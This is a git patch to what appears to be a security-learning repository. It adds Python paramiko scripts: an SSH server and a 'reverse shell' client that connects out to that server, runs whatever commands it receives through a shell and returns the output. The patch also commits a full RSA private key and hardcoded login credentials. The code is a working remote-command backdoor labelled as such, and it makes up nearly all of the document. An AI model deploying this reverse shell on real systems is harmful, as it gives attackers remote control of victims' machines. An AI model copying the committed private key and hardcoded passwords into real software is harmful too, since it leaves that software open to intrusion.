From 780bec574cd0b95c843083455b69b667f9698a9c Mon Sep 17 00:00:00 2001
From: Mari Wahl <mari.wahl9@gmail.com>
Date: Wed, 17 Dec 2014 15:59:49 -0500
Subject: [PATCH] paramiko server and client --> reverse shell script

---
 Network_and_802.11/README.md                  |  2 +
 .../paramiko/ssh_client_reverse.py            | 86 ++++++++++++++++
 Network_and_802.11/paramiko/ssh_server.py     | 98 +++++++++++++++++++
 Network_and_802.11/paramiko/test_rsa.key      | 15 +++
 4 files changed, 201 insertions(+)
 create mode 100755 Network_and_802.11/paramiko/ssh_client_reverse.py
 create mode 100755 Network_and_802.11/paramiko/ssh_server.py
 create mode 100644 Network_and_802.11/paramiko/test_rsa.key

diff --git a/Network_and_802.11/README.md b/Network_and_802.11/README.md
index aedc356..419823f 100644
--- a/Network_and_802.11/README.md
+++ b/Network_and_802.11/README.md
@@ -45,6 +45,8 @@
 
 - Several scripts for SSH connections:
     * ssh client
+    * ssh client for reverse shell
+    * ssh server
     * ssh tunneling
 
 
diff --git a/Network_and_802.11/paramiko/ssh_client_reverse.py b/Network_and_802.11/paramiko/ssh_client_reverse.py
new file mode 100755
index 0000000..641ea1f
--- /dev/null
+++ b/Network_and_802.11/paramiko/ssh_client_reverse.py
@@ -0,0 +1,86 @@
+#!/usr/bin/env python
+
+__author__ = "bt3"
+
+
+import paramiko
+import sys
+import getopt
+import subprocess
+
+def usage():
+    print "Usage: ssh_client.py  <IP> -p <PORT> -u <USER> -c <COMMAND> -a <PASSWORD>"
+    print "  -a                  password authentication"
+    print "  -p                  specify the port"
+    print "  -u                  specify the username"
+    print
+    print "Examples:"
+    print "ssh_client.py localhost -u buffy -p 22 -a killvampires"
+    sys.exit()
+
+
+def ssh_client(ip, port, user, passwd):
+    client = paramiko.SSHClient()
+    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+    client.connect(ip, port=port, username=user, password=passwd)
+    ssh_session = client.get_transport().open_session()
+
+    if ssh_session.active:
+        print ssh_session.recv(1024)
+        while 1:
+            command = ssh_session.recv(1024)
+            try:
+                cmd_output = subprocess.check_output(command, shell=True)
+                ssh_session.send(cmd_output)
+            except Exception, e:
+                ssh_session.send(str(e))
+        client.close()
+
+
+def main():
+
+    if not len(sys.argv[1:]):
+        usage()
+
+    # parse the arguments
+    IP = '0.0.0.0'
+    USER = ''
+    PASSWORD = ''
+    PORT = 0
+
+    try:
+        opts = getopt.getopt(sys.argv[2:],"p:u:a:", \
+            ["PORT", "USER", "PASSWORD"])[0]
+    except getopt.GetoptError as err:
+        print str(err)
+        usage()
+
+    # Get user and ip
+    IP = sys.argv[1]
+    print "[*] Initializing connection to " + IP
+
+    # Handle the options and arguments
+    for t in opts:
+        if t[0] in ('-a'):
+            PASSWORD = t[1]
+        elif t[0] in ('-p'):
+            PORT = int(t[1])
+        elif t[0] in ('-u'):
+            USER = t[1]
+        else:
+            print "This option does not exist!"
+            usage()
+
+    if USER:
+        print "[*] User set to " + USER
+    if PORT:
+        print "[*] The port to be used is %d. " % PORT
+    if PASSWORD:
+        print "[*] A password with length %d was submitted. " %len(PASSWORD)
+
+    # start the client
+    ssh_client(IP, PORT, USER, PASSWORD)
+
+
+if __name__ == '__main__':
+    main()
diff --git a/Network_and_802.11/paramiko/ssh_server.py b/Network_and_802.11/paramiko/ssh_server.py
new file mode 100755
index 0000000..2f02c13
--- /dev/null
+++ b/Network_and_802.11/paramiko/ssh_server.py
@@ -0,0 +1,98 @@
+#!/usr/bin/env python
+
+__author__ = "bt3"
+
+
+import paramiko
+import getopt
+import threading
+import sys
+import socket
+
+HOST_KEY = paramiko.RSAKey(filename='test_rsa.key')
+USERNAME = 'buffy'
+PASSWORD = 'killvampires'
+
+
+class Server(paramiko.ServerInterface):
+
+    def __init__(self):
+        self.event = threading.Event()
+
+    def check_channel_request(self, kind, chanid):
+        if kind == 'session':
+            return paramiko.OPEN_SUCCEEDED
+        return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
+
+    def check_auth_password(self, username, password):
+        if (username == USERNAME) and (password == PASSWORD):
+            return paramiko.AUTH_SUCCESSFUL
+        return paramiko.AUTH_FAILED
+
+
+def main():
+
+    if not len(sys.argv[1:]):
+        print "Usage: ssh_server.py <SERVER>  <PORT>"
+        sys.exit(0)
+
+    # creating a socket object
+    server = sys.argv[1]
+    ssh_port = int(sys.argv[2])
+    try:
+        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+        sock.bind((server, ssh_port))
+        sock.listen(100)
+        print "[+] Listening for connection ..."
+        client, addr = sock.accept()
+    except Exception, e:
+        print "[-] Connection Failed: " + str(e)
+        sys.exit(1)
+    print "[+] Connection Established!"
+
+
+    # creating a paramiko object
+    try:
+        Session = paramiko.Transport(client)
+        Session.add_server_key(HOST_KEY)
+        paramiko.util.log_to_file("filename.log")
+        server = Server()
+        try:
+            Session.start_server(server=server)
+        except paramiko.SSHException, x:
+            print '[-] SSH negotiation failed.'
+
+
+        chan = Session.accept(10)
+
+        print '[+] Authenticated!'
+        chan.send("Welcome to Buffy's SSH")
+        while 1:
+            try:
+                command = raw_input("Enter command: ").strip('\n')
+                if command != 'exit':
+                    chan.send(command)
+                    print chan.recv(1024) + '\n'
+                else:
+                    chan.send('exit')
+                    print '[*] Exiting ...'
+                    session.close()
+                    raise Exception('exit')
+            except KeyboardInterrupt:
+                session.close()
+
+
+    except Exception, e:
+        print "[-] Caught exception: " + str(e)
+        try:
+            session.close()
+        except:
+            pass
+        sys.exit(1)
+
+
+
+
+if __name__ == '__main__':
+    main()
\ No newline at end of file
diff --git a/Network_and_802.11/paramiko/test_rsa.key b/Network_and_802.11/paramiko/test_rsa.key
new file mode 100644
index 0000000..f50e9c5
--- /dev/null
+++ b/Network_and_802.11/paramiko/test_rsa.key
@@ -0,0 +1,15 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIICWgIBAAKBgQDTj1bqB4WmayWNPB+8jVSYpZYk80Ujvj680pOTh2bORBjbIAyz
+oWGW+GUjzKxTiiPvVmxFgx5wdsFvF03v34lEVVhMpouqPAYQ15N37K/ir5XY+9m/
+d8ufMCkjeXsQkKqFbAlQcnWMCRnOoPHS3I4vi6hmnDDeeYTSRvfLbW0fhwIBIwKB
+gBIiOqZYaoqbeD9OS9z2K9KR2atlTxGxOJPXiP4ESqP3NVScWNwyZ3NXHpyrJLa0
+EbVtzsQhLn6rF+TzXnOlcipFvjsem3iYzCpuChfGQ6SovTcOjHV9z+hnpXvQ/fon
+soVRZY65wKnF7IAoUwTmJS9opqgrN6kRgCd3DASAMd1bAkEA96SBVWFt/fJBNJ9H
+tYnBKZGw0VeHOYmVYbvMSstssn8un+pQpUm9vlG/bp7Oxd/m+b9KWEh2xPfv6zqU
+avNwHwJBANqzGZa/EpzF4J8pGti7oIAPUIDGMtfIcmqNXVMckrmzQ2vTfqtkEZsA
+4rE1IERRyiJQx6EJsz21wJmGV9WJQ5kCQQDwkS0uXqVdFzgHO6S++tjmjYcxwr3g
+H0CoFYSgbddOT6miqRskOQF3DZVkJT3kyuBgU2zKygz52ukQZMqxCb1fAkASvuTv
+qfpH87Qq5kQhNKdbbwbmd2NxlNabazPijWuphGTdW0VfJdWfklyS2Kr+iqrs/5wV
+HhathJt636Eg7oIjAkA8ht3MQ+XSl9yIJIS8gVpbPxSw5OMfw0PjVE7tBdQruiSc
+nvuQES5C9BMHjF39LZiGH1iLQy7FgdHyoP+eodI7
+-----END RSA PRIVATE KEY-----